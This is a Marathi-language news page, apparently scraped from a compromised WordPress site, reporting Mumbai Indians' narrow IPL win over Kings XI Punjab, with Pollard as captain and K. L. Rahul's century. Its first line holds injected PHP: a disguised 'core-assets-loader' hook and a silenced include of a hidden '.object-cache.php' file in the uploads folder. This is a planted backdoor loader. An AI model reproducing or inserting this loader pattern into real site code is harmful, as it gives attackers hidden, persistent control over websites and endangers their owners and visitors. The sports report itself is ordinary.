add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); IPL रोमांचक लढतीत मुंबई इंडियन्सचा पंजाबवर विजय – SOCH INDIA
Menu

खेल
IPL रोमांचक लढतीत मुंबई इंडियन्सचा पंजाबवर विजय

nobanner

अखेरच्या बॉलपर्यंत श्वास रोखून धरायला लावलेल्या रोमांचक लढतीत मुंबई इंडियन्सने किंग्ज इलेव्हन पंजाबवर तीन गडी राखून विजय मिळवला. या विजयामुळे आयपीएल गुणतालिकेत मुंबईने पाचवरून थेट तिसऱ्या स्थानावर मजल मारली आहे.

मुंबई इंडियन्सने नाणेफेक जिंकून प्रथम क्षेत्ररक्षणाचा निर्णय घेतला होता. पंजाबने मुंबईला १९८ धावांचं मोठं आव्हान दिलं. हे आव्हान पेलताना सुरुवातीलाच मुंबईचे विकेट्स लवकर पडले. परिणामी हा धावांचा डोंगर पार करताना मुंबई संघाची पार दमछाक झाली. अर्थात पोलार्ड नावाची धुगधुगी मुंबई संघात कायम होती. पोलार्डनेच मुंबईच्या संघाला तारले आणि आजची रोहित शर्माऐवजी आपल्या खांद्यावर असलेली कर्णधारपदाची धुरा उत्तम पेलली.

दरम्यान, पंजाब संघाच्या के. एल. राहुलने देखील आज दमदार कामगिरी केली. सलामीला आलेल्या राहुलने अखेरपर्यंत तुफान फटकेबाजी केली आणि धडाकेबाज शतक झळकावले. त्याच्या आयपीएल कारकिर्दीतले हे पहिले शतक होते.